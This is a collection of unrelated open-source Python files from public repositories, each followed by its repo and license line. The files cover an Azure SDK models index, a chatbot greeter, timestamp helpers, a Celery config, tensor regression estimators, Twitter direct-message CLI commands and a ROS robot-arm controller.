from ._models_py3 import AzureResourceBase
from ._models_py3 import ErrorAdditionalInfo
from ._models_py3 import ErrorResponse
from ._models_py3 import SystemData
from ._models_py3 import TemplateSpec
from ._models_py3 import TemplateSpecArtifact
from ._models_py3 import TemplateSpecTemplateArtifact
from ._models_py3 import TemplateSpecUpdateModel
from ._models_py3 import TemplateSpecVersion
from ._models_py3 import TemplateSpecVersionInfo
from ._models_py3 import TemplateSpecVersionUpdateModel
from ._models_py3 import TemplateSpecVersionsListResult
from ._models_py3 import TemplateSpecsError
from ._models_py3 import TemplateSpecsListResult
from ._template_specs_client_enums import (
CreatedByType,
TemplateSpecArtifactKind,
TemplateSpecExpandKind,
)
__all__ = [
'AzureResourceBase',
'ErrorAdditionalInfo',
'ErrorResponse',
'SystemData',
'TemplateSpec',
'TemplateSpecArtifact',
'TemplateSpecTemplateArtifact',
'TemplateSpecUpdateModel',
'TemplateSpecVersion',
'TemplateSpecVersionInfo',
'TemplateSpecVersionUpdateModel',
'TemplateSpecVersionsListResult',
'TemplateSpecsError',
'TemplateSpecsListResult',
'CreatedByType',
'TemplateSpecArtifactKind',
'TemplateSpecExpandKind',
]
| Azure/azure-sdk-for-python | sdk/resources/azure-mgmt-resource/azure/mgmt/resource/templatespecs/v2019_06_01_preview/models/__init__.py | Python | mit | 1,737 |
from users_push.userposter import send_message
class UserHostess:
    def greet_user(self, user_id):
        send_message("Hey!", user_id)

    def identification_user(self, user_id):
        send_message("Please follow the link and paste the code back to me!", user_id)

    def identification_completed_user(self, user_id):
        send_message("Hey, everything is set up!", user_id)

    def something_gone_wrong(self, user_id):
        send_message("Ouch!", user_id)
        send_message("Something went wrong", user_id)
        send_message("I will keep you informed", user_id)

    def upload_succeeded(self, user_id):
        send_message("Hey, nice job!", user_id)

    def request_not_understood(self, user_id):
        send_message("Hmm, I don't understand", user_id)

    def user_identification_url(self, user_id, url):
        send_message(url, user_id)
| ThibF/G-youmus | users_push/userhostess.py | Python | mit | 872 |
#Copyright (c) 2012 Luminoso, LLC
#
#Permission is hereby granted, free of charge, to any person obtaining a
#copy of this software and associated documentation files (the "Software"),
#to deal in the Software without restriction, including without limitation
#the rights to use, copy, modify, merge, publish, distribute, sublicense,
#and/or sell copies of the Software, and to permit persons to whom the
#Software is furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in
#all copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
#FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
#DEALINGS IN THE SOFTWARE.
# Load timestamp methods
from datetime import datetime
from time import mktime
def datetime2epoch(dt):
"""Convert a datetime object into milliseconds from epoch"""
return int(mktime(dt.timetuple())*1000)
def epoch2datetime(t):
"""Convert milliseconds from epoch to a local datetime object"""
return datetime.fromtimestamp(t/1000.0)
def epoch():
"""Get the current time in milliseconds from epoch"""
return datetime2epoch(datetime.now())
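A quick round-trip of the helpers above; note that `timetuple()` drops microseconds, so conversions are exact only at whole-second resolution:

```python
from jstime import datetime2epoch, epoch2datetime, epoch

now_ms = epoch()                     # current time in ms since the epoch
dt = epoch2datetime(now_ms)          # back to a local datetime
assert datetime2epoch(dt) == now_ms  # exact, since epoch() has whole-second precision
```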
| LuminosoInsight/jstime | jstime.py | Python | mit | 1,541 |
"""
Celery config for tiny_hands_pac project.
For more information on this file, see
http://celery.readthedocs.org/en/latest/django/first-steps-with-django.html
Run your celery worker(s) as `djcelery`, which is an alias for
`celery -A tiny_hands_pac worker --loglevel=info`.
A celerybeat scheduler can be started together with a worker by `djcelery -B`
or as a separate process:
`celery -A tiny_hands_pac beat --loglevel=info -s /tmp/celerybeat-schedule`.
It needs to store the last run times of the tasks in a local database file:
if no -s option is provided, it defaults to the cwd. In production it shouldn't live in /tmp/.
"""
from __future__ import absolute_import
import os
from celery import Celery
from django.conf import settings
# set the default Django settings module for the 'celery' program.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tiny_hands_pac.settings.production")
app = Celery("tiny_hands_pac")
app.config_from_object('django.conf:settings')
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
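With this app in place, `autodiscover_tasks()` picks up tasks from each installed app's `tasks.py`; a minimal sketch of such a task (the app and task names here are hypothetical):

```python
# e.g. in donations/tasks.py -- hypothetical module and task names
from celery import shared_task

@shared_task
def send_thank_you_email(donor_id):
    # Executed on a worker started with:
    #   celery -A tiny_hands_pac worker --loglevel=info
    print("Thanking donor %s" % donor_id)

# Callers enqueue it asynchronously:
# send_thank_you_email.delay(42)
```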
| DonaldTrumpHasTinyHands/tiny_hands_pac | tiny_hands_pac/celery.py | Python | mit | 1,032 |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import sktensor as skt
import scipy.sparse.linalg
from utils import rmse
from sklearn.base import BaseEstimator
import traceback
class TensorRegression(BaseEstimator):
"""
Scikit learn estimator for various regression methods (see paper for details):
- RLS: Regularized Least Squares
- LRR: Low-rank regression (i.e. reduced rank regression)
- HOLRR: Higher-order low-rank regression
- K-{ALGO}: Kernelized version of the above algorithms.
"""
def __init__(self, algo, gamma=0., rank=None, kernel_fct=None, cov=None, beta=0.,noise_est=None):
self.W = None
assert algo in ['RLS','HOLRR', 'K_HOLRR', 'LRR', 'K_LRR', 'K_RLS'], 'algorithm %s not implemented' % algo
self.algo = algo
self.gamma = gamma
self.rank = rank
self.kernel_fct = kernel_fct
self.cov = cov
self.beta = beta
self.noise_est = noise_est
if cov is not None and np.linalg.matrix_rank(cov) < cov.shape[0]:
cov += np.eye(cov.shape[0]) * 1e-5
def get_params(self, deep=True):
return {'gamma':self.gamma, 'rank':self.rank,
'algo':self.algo, 'kernel_fct':self.kernel_fct,
'beta':self.beta}
def set_params(self,**d):
for parameter, value in d.items():
setattr(self,parameter, value)
return self
def predict(self,X):
X = skt.dtensor(X)
if self.algo[:2] == 'K_':
X = X.unfold(0)
K = self.kernel_fct.gram_matrix(self.traindata,X)
return self.W.ttm(K,0)
else:
return self.W.ttm(X.unfold(0),0)
def fit(self,X, Y):
X = skt.dtensor(X)
Y = skt.dtensor(Y)
self.traindata = X
try:
if self.algo == "RLS":
self.W = RLS(X,Y, gamma=self.gamma)
elif self.algo == "HOLRR":
self.W = HOLRR(X,Y,gamma=self.gamma,R=self.rank)
elif self.algo == 'LRR':
self.W = LRR(X,Y,rank=self.rank,gamma=self.gamma)
elif self.algo == 'K_HOLRR':
self.W = K_HOLRR(X,Y,rank=self.rank,kernel=self.kernel_fct,gamma=self.gamma)
elif self.algo == 'K_RLS':
self.W = K_RLS(X,Y,kernel=self.kernel_fct,gamma=self.gamma)
elif self.algo == 'K_LRR':
self.W = K_LRR(X,Y,self.rank,self.kernel_fct,self.gamma)
except:
traceback.print_exc()
if self.algo[:2] == 'K_':
self.W = skt.dtensor(np.zeros(X.shape[:1] + Y.shape[1:]))
else:
self.W = skt.dtensor(np.zeros(X.shape[1:] + Y.shape[1:]))
def score(self,X,Y):
return -1*self.loss(X,Y)
def loss(self,X,Y):
return rmse(self.predict(X),Y)
def RLS(X,Y, gamma = 0.):
X_mat = X.unfold(0)
Y_mat = Y.unfold(0)
W_ols = np.linalg.inv(X_mat.T.dot(X_mat) + gamma * np.eye(X_mat.shape[1])).dot(X_mat.T).dot(Y_mat)
W_ols.ten_shape = X_mat.shape[1:] + Y.shape[1:]
return W_ols.fold()
def LRR(X,Y, rank, gamma = 0.):
    if isinstance(X, skt.dtensor):
        X = X.unfold(0)
Y_mat = Y.unfold(0)
XtX = X.T.dot(X)
XtX_inv = np.linalg.inv(XtX + gamma * np.eye(X.shape[1]))
W_ols = skt.dtensor(XtX_inv.dot(X.T).dot(Y_mat)).unfold(0)
W_ols.ten_shape = X.shape[1:] + Y.shape[1:]
_,V = scipy.sparse.linalg.eigs(Y_mat.T.dot(X).dot(XtX_inv).dot(X.T).dot(Y_mat),k=rank)
P = V.dot(V.T)
W_rr = W_ols.dot(P).fold()
return W_rr
def HOLRR(X,Y,R,gamma = 0.):
    if isinstance(X, skt.dtensor):
        X = X.unfold(0)
W_shape = X.shape[1:] + Y.shape[1:]
I = np.eye(X.shape[1])
M = []
XX_inv = np.linalg.inv(X.T.dot(X) + gamma*I)
A = XX_inv.dot(X.T).dot(Y.unfold(0)).dot(Y.unfold(0).T).dot(X)
if R[0] == W_shape[0]:
U = np.eye(R[0])
else:
ev,U = scipy.sparse.linalg.eigs(A,k=R[0])
M.append(U)
for i in range(1,len(R)):
if R[i] == W_shape[i]:
tmp = np.eye(W_shape[i])
else:
tmp = skt.core.nvecs(Y,i,R[i])
M.append(tmp)
U1 = M[0]
G = Y.ttm([(np.linalg.inv(U1.T.dot(X.T.dot(X)+gamma*I).dot(U1)).dot(U1.T).dot(X.T)).T] + M[1:], transp=True)
return G.ttm(M)
def K_HOLRR(X,Y,rank,kernel, gamma = 0., verbose = -1):
K = kernel.gram_matrix(X)
I = np.eye(X.shape[0])
M = []
W_shape = K.shape[1:] + Y.shape[1:]
K_inv = np.linalg.inv(K + gamma*I)
A = K_inv.dot(Y.unfold(0)).dot(Y.unfold(0).T).dot(K)
if rank[0] == W_shape[0]:
U = np.eye(rank[0])
else:
try:
ev,U = scipy.sparse.linalg.eigs(A,k=rank[0])
except scipy.sparse.linalg.ArpackNoConvergence:
            print("eigen decomposition did not converge... " + str(Y.shape) + " " + str(rank) + " " + str(kernel))
return skt.dtensor(np.zeros(W_shape))
M.append(U)
for i in range(1,len(rank)):
if rank[i] == W_shape[i]:
tmp = np.eye(W_shape[i])
else:
tmp = skt.core.nvecs(Y,i,rank[i])
M.append(tmp)
U1 = M[0]
G = Y.ttm([((np.linalg.inv(U1.T.dot(K).dot(K+gamma*I).dot(U1))).dot(U1.T).dot(K)).T] + M[1:], transp=True)
return G.ttm(M)
def K_LRR(X,Y,R,kernel, gamma = 0.):
K = kernel.gram_matrix(X)
return LRR(K,Y,R,gamma)
def K_RLS(X,Y, kernel,gamma = 0.):
K = kernel.gram_matrix(X)
C = RLS(skt.dtensor(K),Y,gamma)
return C
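A hedged smoke-test sketch for the estimator above on random data, following the code's convention that the first axis of X and Y indexes samples (shapes and hyperparameters here are illustrative only):

```python
import numpy as np

N, d = 50, 10                     # samples, input features
out_shape = (4, 3)                # trailing output modes
X = np.random.randn(N, d)
Y = np.random.randn(N, out_shape[0], out_shape[1])

model = TensorRegression(algo='RLS', gamma=0.1)
model.fit(X, Y)
Y_hat = model.predict(X)          # expected shape: (50, 4, 3)
print(Y_hat.shape)
print(model.score(X, Y))          # negative RMSE
```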
| grwip/HOLRR | models.py | Python | mit | 5,532 |
"""direct_messages.py: Implementation of class
AbstractTwitterDirectMessageCommand and its subclasses.
"""
from argparse import ArgumentParser
from . import AbstractTwitterCommand, call_decorator
from ..parsers import (
filter_args,
cache,
parser_user_single,
parser_count_statuses,
parser_page,
parser_since_max_ids,
parser_include_entities,
parser_skip_status,)
# GET direct_messages
# POST direct_messages/destroy
# POST direct_messages/new
# GET direct_messages/sent
# GET direct_messages/show
DM = ('direct_messages', 'list')
DM_DESTROY = ('direct_messages/destroy', 'destroy')
DM_NEW = ('direct_messages/new', 'new', 'create')
DM_SENT = ('direct_messages/sent', 'sent')
DM_SHOW = ('direct_messages/show', 'show')
# pylint: disable=abstract-method
class AbstractTwitterDirectMessageCommand(AbstractTwitterCommand):
"""n/a"""
pass
class Command(AbstractTwitterDirectMessageCommand):
"""Print the 20 most recent direct messages sent to the
authenticating user.
"""
def create_parser(self, subparsers):
parser = subparsers.add_parser(
DM[0],
aliases=DM[1:],
parents=[parser_since_max_ids(),
parser_count_statuses(), # 20, 200
parser_include_entities(),
parser_skip_status()],
help=self.__doc__)
return parser
@call_decorator
def __call__(self):
"""Request GET direct_messages for Twitter."""
kwargs = filter_args(
vars(self.args),
'since_id', 'max_id',
'count', 'include_entities', 'skip_status')
return kwargs, self.twhandler.direct_messages
class CommandDestroy(AbstractTwitterDirectMessageCommand):
"""Destroy the direct message specified in the required ID
parameter.
"""
def create_parser(self, subparsers):
parser = subparsers.add_parser(
DM_DESTROY[0],
aliases=DM_DESTROY[1:],
parents=[parser_id(),
parser_include_entities()],
help=self.__doc__)
return parser
@call_decorator
def __call__(self):
"""Request POST direct_messages/destroy for Twitter."""
kwargs = filter_args(
vars(self.args),
'_id', 'include_entities')
return kwargs, self.twhandler.direct_messages.destroy
class CommandNew(AbstractTwitterDirectMessageCommand):
"""Send a new direct message to the specified user from the
authenticating user.
"""
def create_parser(self, subparsers):
parser = subparsers.add_parser(
DM_NEW[0],
aliases=DM_NEW[1:],
parents=[parser_user_single()],
help=self.__doc__)
parser.add_argument(
'text',
help='the text of your direct message')
return parser
@call_decorator
def __call__(self):
"""Request POST direct_messages/new for Twitter."""
kwargs = filter_args(
vars(self.args),
'user_id', 'screen_name', 'text')
return kwargs, self.twhandler.direct_messages.new
class CommandSent(AbstractTwitterDirectMessageCommand):
"""Print the 20 most recent direct messages sent by the
authenticating user.
"""
def create_parser(self, subparsers):
parser = subparsers.add_parser(
DM_SENT[0],
aliases=DM_SENT[1:],
parents=[parser_since_max_ids(),
parser_count_statuses(),
parser_page(),
parser_include_entities()],
help=self.__doc__)
return parser
@call_decorator
def __call__(self):
"""Request GET direct_messages/sent for Twitter."""
kwargs = filter_args(
vars(self.args),
'since_id', 'max_id',
'count', 'page', 'include_entities')
return kwargs, self.twhandler.direct_messages.sent
class CommandShow(AbstractTwitterDirectMessageCommand):
"""Print a single direct message, specified by an id parameter."""
def create_parser(self, subparsers):
parser = subparsers.add_parser(
DM_SHOW[0],
aliases=DM_SHOW[1:],
parents=[parser_id()],
help=self.__doc__)
return parser
@call_decorator
def __call__(self):
"""Request GET direct_messages/show for Twitter."""
# pylint: disable=protected-access
return dict(_id=self.args._id), self.twhandler.direct_messages.show
def make_commands(manager):
"""Prototype"""
# pylint: disable=no-member
return (cmd_t(manager) for cmd_t in
AbstractTwitterDirectMessageCommand.__subclasses__())
@cache
def parser_id():
"""Return the parser for id argument."""
parser = ArgumentParser(add_help=False)
parser.add_argument(
'_id',
metavar='<dm_id>',
help='the ID of the direct message to delete')
return parser
| showa-yojyo/bin | twmods/commands/direct_messages.py | Python | mit | 5,011 |
import roslib; roslib.load_manifest('hlpr_manipulation_utils')
from sensor_msgs.msg import JointState
from vector_msgs.msg import JacoCartesianVelocityCmd, LinearActuatorCmd, GripperCmd, GripperStat
from trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint
from wpi_jaco_msgs.msg import AngularCommand, CartesianCommand
#from wpi_jaco_msgs.srv import GravComp
from hlpr_manipulation_utils.arm_moveit import *
import rospy
from math import pi, sqrt
from collections import namedtuple
from control_msgs.msg import FollowJointTrajectoryGoal, FollowJointTrajectoryAction
import actionlib
import time
class Manipulator:
def __init__(self, arm_prefix = 'right'):
        self.arm = Arm(arm_prefix)
        self.gripper = Gripper(arm_prefix)
self.linear_actuator = LinearActuator()
class Gripper:
def __init__(self, prefix='right'):
self.pub_grp = rospy.Publisher('/vector/'+prefix+'_gripper/cmd', GripperCmd, queue_size = 10)
self.cmd = GripperCmd()
        # I have it here, but it is not useful
#rospy.Subscriber('/vector/right_gripper/joint_states', JointState, self.js_cb)
#self.last_js_update = None
#self.joint_state = None
rospy.Subscriber('/vector/'+prefix+'_gripper/stat', GripperStat, self.st_cb)
self.last_st_update = None
        self.gripperStat = GripperStat()
#def js_cb(self, inState):
# self.joint_state = inState.position
# self.last_js_update = rospy.get_time()
    def st_cb(self, inStat):
        self.gripperStat = inStat
        self.last_st_update = rospy.get_time()
def is_ready(self):
return self.gripperStat.is_ready
def is_reset(self):
return self.gripperStat.is_reset
def is_moving(self):
return self.gripperStat.is_moving
def object_detected(self):
return self.gripperStat.obj_detected
def get_pos(self):
return self.gripperStat.position
def get_commanded_pos(self):
return self.gripperStat.requested_position
def get_applied_current(self):
return self.gripperStat.current
def set_pos(self, position, speed = 0.02, force = 100, rate = 10, iterations = 5):
self.cmd.position = position
self.cmd.speed = speed
self.cmd.force = force
rrate = rospy.Rate(rate)
for i in range(0,iterations):
self.pub_grp.publish(self.cmd)
rrate.sleep()
def open(self, speed = 0.02, force = 100):
self.set_pos(0.085,speed,force)
def close(self, speed = 0.02, force = 100):
self.set_pos(0,speed,force)
class LinearActuator:
def __init__(self):
self.pub_lin = rospy.Publisher('/vector/linear_actuator_cmd', LinearActuatorCmd, queue_size = 10)
self.cmd = LinearActuatorCmd()
        # I agree that the naming is weird
rospy.Subscriber('/vector/joint_states', JointState, self.js_cb)
self.last_js_update = None
self.joint_state = None
def js_cb(self, inState):
self.joint_state = inState.position
self.last_js_update = rospy.get_time()
def set_pos(self, position, vel = 0.):
self.cmd = LinearActuatorCmd()
self.cmd.desired_position_m = position
if not vel == 0:
print 'What are you thinking? Setting the vel back to 0. If you are sure, change this line in the code'
vel = 0.
#probably feed forward velocity
self.cmd.fdfwd_vel_mps = vel
self.pub_lin.publish(self.cmd)
class Arm:
def __init__(self, arm_prefix = 'right'):
self.pub_jaco_ang = rospy.Publisher('/jaco_arm/angular_cmd', AngularCommand, queue_size = 10, latch=True)
self.pub_jaco_cart = rospy.Publisher('/jaco_arm/cartesian_cmd', CartesianCommand, queue_size = 10, latch=True)
self._arm_prefix = arm_prefix
self.arm_joint_names = [ self._arm_prefix + "_shoulder_pan_joint", self._arm_prefix + "_shoulder_lift_joint", self._arm_prefix + "_elbow_joint",
self._arm_prefix + "_wrist_1_joint", self._arm_prefix + "_wrist_2_joint", self._arm_prefix + "_wrist_3_joint"]
self.joint_states = [0 for i in range(0,len( self.arm_joint_names))]
        rospy.Subscriber('/vector/' + self._arm_prefix + '_arm/joint_states', JointState, self.js_cb)
self.last_js_update = None
self.smooth_joint_trajectory_client = actionlib.SimpleActionClient('/jaco_arm/joint_velocity_controller/trajectory', FollowJointTrajectoryAction)
#if(self.smooth_joint_trajectory_client.wait_for_server(rospy.Duration(5.0))):
if(self.smooth_joint_trajectory_client.wait_for_server()):
self.traj_connection = True
else:
self.traj_connection = False
print self.traj_connection
self.angular_cmd = AngularCommand()
self.angular_cmd.armCommand = True
self.angular_cmd.fingerCommand = False
self.angular_cmd.repeat = True
self.cartesian_cmd = CartesianCommand()
self.cartesian_cmd.armCommand = True
self.cartesian_cmd.fingerCommand = False
self.cartesian_cmd.repeat = True
self._init_tuck_poses()
# if(rospy.wait_for_service('/jaco_arm/grav_comp')):
# self.gc_connection = True
# else:
self.gc_connection = False
# self.grav_comp_client = rospy.ServiceProxy('/jaco_arm/grav_comp', GravComp)
self.arm_planner = ArmMoveIt()
def _get_arm_joint_values(self, msg):
# Cycle through the active joints and populate
# a dictionary for those values
joint_values = dict()
        for joint_name in self.arm_joint_names:
# Find that joint name in msg
idx = msg.name.index(joint_name)
# Populate the joint message in a dictionary
joint_values[joint_name] = msg.position[idx]
return joint_values
def enableGravComp(self):
#if(not self.gc_connection):
# print 'GravComp Service not available'
print self.grav_comp_client(True)
def disableGravComp(self):
#if(not self.gc_connection):
# print 'GravComp Service not available'
print self.grav_comp_client(False)
def js_cb(self, inState):
for i in range(0,len(inState.position)):
self.joint_states[i] = inState.position[i]
self.last_js_update = rospy.get_time()
def get_pos(self):
return self.joint_states
def ang_pos_cmd(self, angles):
if not len(angles) == len(self.arm_joint_names):
print "Number of desired joint angles does not match the number of available joints"
return
self.angular_cmd.position = True
self.angular_cmd.joints = angles
self.pub_jaco_ang.publish(self.angular_cmd)
def ang_vel_cmd(self, velocities):
if not len(velocities) == len(self.arm_joint_names):
print "Number of desired joint velocities does not match the number of available joints"
return
self.angular_cmd.position = False
self.angular_cmd.joints = velocities
self.pub_jaco_ang.publish(self.angular_cmd)
    def cart_pos_cmd(self, pose, rotation = None):
        # Accepts either a full 6-element pose [x, y, z, rx, ry, rz], or a
        # 3-element translation plus a 3-element rotation
        if rotation is not None:
            if not len(pose) == 3:
                print "Not enough translations specified"
                return
            if not len(rotation) == 3:
                print "Not enough rotations specified"
                return
            pose = list(pose) + list(rotation)
        if not len(pose) == 6:
            print "Not enough pose parameters specified"
            return
        self.cartesian_cmd.position = True
        self.cartesian_cmd.arm.linear.x = pose[0]
        self.cartesian_cmd.arm.linear.y = pose[1]
        self.cartesian_cmd.arm.linear.z = pose[2]
        self.cartesian_cmd.arm.angular.x = pose[3]
        self.cartesian_cmd.arm.angular.y = pose[4]
        self.cartesian_cmd.arm.angular.z = pose[5]
        self.pub_jaco_cart.publish(self.cartesian_cmd)
    def cart_vel_cmd(self, vels, rotation = None):
        # Accepts either a full 6-element twist, or a 3-element linear
        # velocity plus a 3-element angular velocity
        if rotation is not None:
            if not len(vels) == 3:
                print "Not enough translation velocities specified"
                return
            if not len(rotation) == 3:
                print "Not enough rotation velocities specified"
                return
            vels = list(vels) + list(rotation)
        if not len(vels) == 6:
            print "Not enough velocities specified"
            return
        self.cartesian_cmd.position = False
        self.cartesian_cmd.arm.linear.x = vels[0]
        self.cartesian_cmd.arm.linear.y = vels[1]
        self.cartesian_cmd.arm.linear.z = vels[2]
        self.cartesian_cmd.arm.angular.x = vels[3]
        self.cartesian_cmd.arm.angular.y = vels[4]
        self.cartesian_cmd.arm.angular.z = vels[5]
        self.pub_jaco_cart.publish(self.cartesian_cmd)
def ang_cmd_loop(self,angles,rate=10,iterations=5):
rrate = rospy.Rate(rate)
for i in range(0,iterations):
self.ang_pos_cmd(angles)
rrate.sleep()
def ang_cmd_wait(self,angles,epsilon=0.05, maxIter=50, rate=10):
        error = epsilon + 1
        iterNum = 0
#self.ang_cmd_loop(angles,rate)
self.ang_pos_cmd(angles)
rrate = rospy.Rate(rate)
while error > epsilon and iterNum < maxIter:
error = vectorDiff(self.joint_states,angles)
iterNum += 1
rrate.sleep()
if iterNum == maxIter:
return False
return True
#the full handling of vels, accs and effs will come later
# only the waypoints are needed for wpi jaco! the rest gets thrown away anyway so feel free to skip
def sendWaypointTrajectory(self, waypoints, durations = 0., vels = 0., accs = 0., effs = 0.):
if not self.ang_cmd_wait(waypoints[0]):
print 'Cannot go to the first point in the trajectory'
return None
# else:
# print 'Went to first'
if not self.traj_connection:
print 'Action server connection was not established'
return None
joint_traj = JointTrajectory()
        joint_traj.joint_names = self.arm_joint_names
        if not durations == 0:
            if not len(durations) == len(waypoints):
                raise Exception('The number of duration points is not equal to the number of provided waypoints')
        if not vels == 0:
            if not len(vels) == len(waypoints):
                raise Exception('The number of velocity points is not equal to the number of provided waypoints')
        if not accs == 0:
            if not len(accs) == len(waypoints):
                raise Exception('The number of acceleration points is not equal to the number of provided waypoints')
        if not effs == 0:
            if not len(effs) == len(waypoints):
                raise Exception('The number of effort points is not equal to the number of provided waypoints')
        if not effs == 0:
            if not (vels == 0 and accs == 0):
                raise Exception('Cannot specify efforts with velocities and accelerations at the same time')
        if (not accs == 0) and vels == 0:
            raise Exception('Cannot specify accelerations without velocities')
        total_time_from_start = 0.5
for t in range(0, len(waypoints)):
point = JointTrajectoryPoint()
waypoint = waypoints[t]
if not len(waypoint) == len(joint_traj.joint_names):
raise Exception('The number of provided joint positions is not equal to the number of available joints for index: ' + str(t))
point.positions = waypoint
if not vels == 0.:
velocity = vels[t]
if not len(velocity) == len(joint_traj.joint_names):
raise Exception('The number of provided joint velocities is not equal to the number of available joints for index: ' + str(t))
point.velocities = velocity
if not accs == 0.:
acceleration = accs[t]
if not len(acceleration) == len(joint_traj.joint_names):
raise Exception('The number of provided joint accelerations is not equal to the number of available joints for index: ' + str(t))
                point.accelerations = acceleration  # bug fix: the original assigned the undefined name 'accelerations'
if not effs == 0.:
effort = effs[t]
if not len(effort) == len(joint_traj.joint_names):
raise Exception('The number of provided joint efforts is not equal to the number of available joints for index: ' + str(t))
point.effort = effort
            if not durations == 0.:
                point.duration = durations[t]  # bug fix: the original assigned the undefined name 'duration'
# Deal with increasing time for each trajectory point
point.time_from_start = rospy.Duration(total_time_from_start)
total_time_from_start = total_time_from_start + 1.0
# Set the points
joint_traj.points.append(point)
traj_goal = FollowJointTrajectoryGoal()
traj_goal.trajectory = joint_traj
self.smooth_joint_trajectory_client.send_goal(traj_goal)
self.smooth_joint_trajectory_client.wait_for_result()
return self.smooth_joint_trajectory_client.get_result()
# Expects waypoints to be in joint space
def execute_traj_moveit(self, waypoints):
# Cycle through waypoints
for point in waypoints:
plannedTraj = self.arm_planner.plan_jointTargetInput(point)
if plannedTraj == None or len(plannedTraj.joint_trajectory.points) < 1:
print "Error: no plan found"
return -1
else:
traj_goal = FollowJointTrajectoryGoal()
traj_goal.trajectory = plannedTraj.joint_trajectory
self.smooth_joint_trajectory_client.send_goal(traj_goal)
self.smooth_joint_trajectory_client.wait_for_result()
self.smooth_joint_trajectory_client.get_result()
return 1
# Expects waypoints to be in end effector space
def execute_pose_traj_moveit(self, waypoints):
# Cycle through waypoints
for point in waypoints:
plannedTraj = self.arm_planner.plan_poseTargetInput(point)
if plannedTraj == None or len(plannedTraj.joint_trajectory.points) < 1:
print "Error: no plan found"
return -1
else:
self.execute_plan_traj(plannedTraj)
return 1
def execute_plan_traj(self, plannedTraj):
traj_goal = FollowJointTrajectoryGoal()
traj_goal.trajectory = plannedTraj.joint_trajectory
self.smooth_joint_trajectory_client.send_goal(traj_goal)
self.smooth_joint_trajectory_client.wait_for_result()
self.smooth_joint_trajectory_client.get_result()
#TODO: figure this out
def upper_tuck(self, use_moveit=True, vanilla = False):
if use_moveit:
# Just last point
return self.execute_traj_moveit([self.ut_wps[-1]])
elif vanilla:
self.sendWaypointTrajectory(self.ut_wps)
return 1
else:
self._ut_with_network()
return 1
def upper_untuck(self, use_moveit=True, vanilla = False):
if use_moveit:
# Just last point
self.execute_traj_moveit([self.un_ut_wps[-1]])
elif vanilla:
self.sendWaypointTrajectory(self.un_ut_wps)
else:
self.untuck()
def lower_tuck(self, use_moveit=True, vanilla = False):
if use_moveit:
# Just last point
self.execute_traj_moveit([self.lt_wps[-1]])
elif vanilla:
self.sendWaypointTrajectory(self.lt_wps)
else:
self._lt_with_network()
def lower_untuck(self, use_moveit=True, vanilla = False):
if use_moveit:
# Just last point
self.execute_traj_moveit([self.un_lt_wps[-1]])
elif vanilla:
self.sendWaypointTrajectory(self.un_lt_wps)
else:
self.untuck()
def untuck(self, use_moveit=True):
if use_moveit:
# Just last point
self.execute_traj_moveit([self.tuck_network[-1]])
else:
self._untuck_with_network()
def _init_tuck_poses(self):
self.mid_wp = [-1.57, 3.14, 1.05, -1.57, 1.05, 1.57]
lt_wp0 = [-1.65, 3.68, 1.12, -2.13, 1.48, 2.10]
lt_wp1 = [-1.49, 4.00, 1.47, -1.74, 1.25, 1.96]
lt_wp2 = [-1.23, 4.50, 0.95, -2.31, 1.82, 1.96]
lt_wp3 = [-1.21, 4.76, 0.83, -2.60, 2.56, 1.63]
self.lt_wps = [lt_wp0, lt_wp1, lt_wp2, lt_wp3]
self.un_lt_wps = self.lt_wps[::-1]
ut_wp0 = [-1.60, 2.20, 0.80, -2.20, 1.50, 1.20]
ut_wp1 = [-1.70, 2.00, 1.00, -2.20, 2.00, 0.90]
ut_wp2 = [-1.80, 1.80, 1.00, -2.10, 2.50, 0.72]
ut_wp3 = [-1.90, 1.50, 0.50, -2.00, 3.0, 0.72]
self.ut_wps = [ut_wp0,ut_wp1,ut_wp2,ut_wp3]
self.un_ut_wps = self.ut_wps[::-1]
self.tuck_network = self.un_lt_wps + [self.mid_wp] + self.ut_wps
self.reversed_tuck_network = self.tuck_network[::-1]
def _find_closest_tuck_wp(self, tuck_wps, max_allowed_dist = 8.0):
if self.last_js_update is not None:
if self.last_js_update + 2.0 < rospy.get_time():
print 'The newest joint state information is too old.'
return None
        minDiff = 1000
minInd = -1
for i in range(0,len(tuck_wps)):
diff = vectorDiff(tuck_wps[i],self.joint_states)
if diff < minDiff:
minDiff = diff
minInd = i
if minDiff > max_allowed_dist:
print 'Current arm configuration ' + str(self.joint_states) + ' is too far from the tuck network: ' + str(minDiff) + ' ' + str(minInd)
return None
return minInd
def _lt_with_network(self):
ind = self._find_closest_tuck_wp(self.reversed_tuck_network)
if ind is not None:
self.sendWaypointTrajectory(self.reversed_tuck_network[ind:])
def _ut_with_network(self):
ind = self._find_closest_tuck_wp(self.tuck_network)
if ind is not None:
self.sendWaypointTrajectory(self.tuck_network[ind:])
def _untuck_with_network(self):
ind = self._find_closest_tuck_wp(self.tuck_network)
if ind is not None:
            midPoint = 4
if ind == midPoint:
wps = self.tuck_network[midPoint]
elif ind < midPoint:
wps = self.tuck_network[ind:midPoint+1]
else:
wps = self.reversed_tuck_network[(len(self.reversed_tuck_network)-ind+1):midPoint+1]
self.sendWaypointTrajectory(wps)
def vectorDiff(v1, v2):
    error = 0
    l = min(len(v1), len(v2))
    for i in range(0, l):
        diff = (v1[i] - v2[i])
        error += diff * diff
    error = sqrt(error)
    return error
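
# --- Illustrative usage sketch (added; not part of the original file) ---
# Assuming an instance of the arm class defined above (here called 'arm'),
# a short joint-space trajectory could be issued like this, using two of the
# tuck waypoints defined in _init_tuck_poses:
#
#     wp0 = [-1.65, 3.68, 1.12, -2.13, 1.48, 2.10]
#     wp1 = [-1.49, 4.00, 1.47, -1.74, 1.25, 1.96]
#     arm.sendWaypointTrajectory([wp0, wp1])
#     arm.upper_tuck(use_moveit=True)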
|
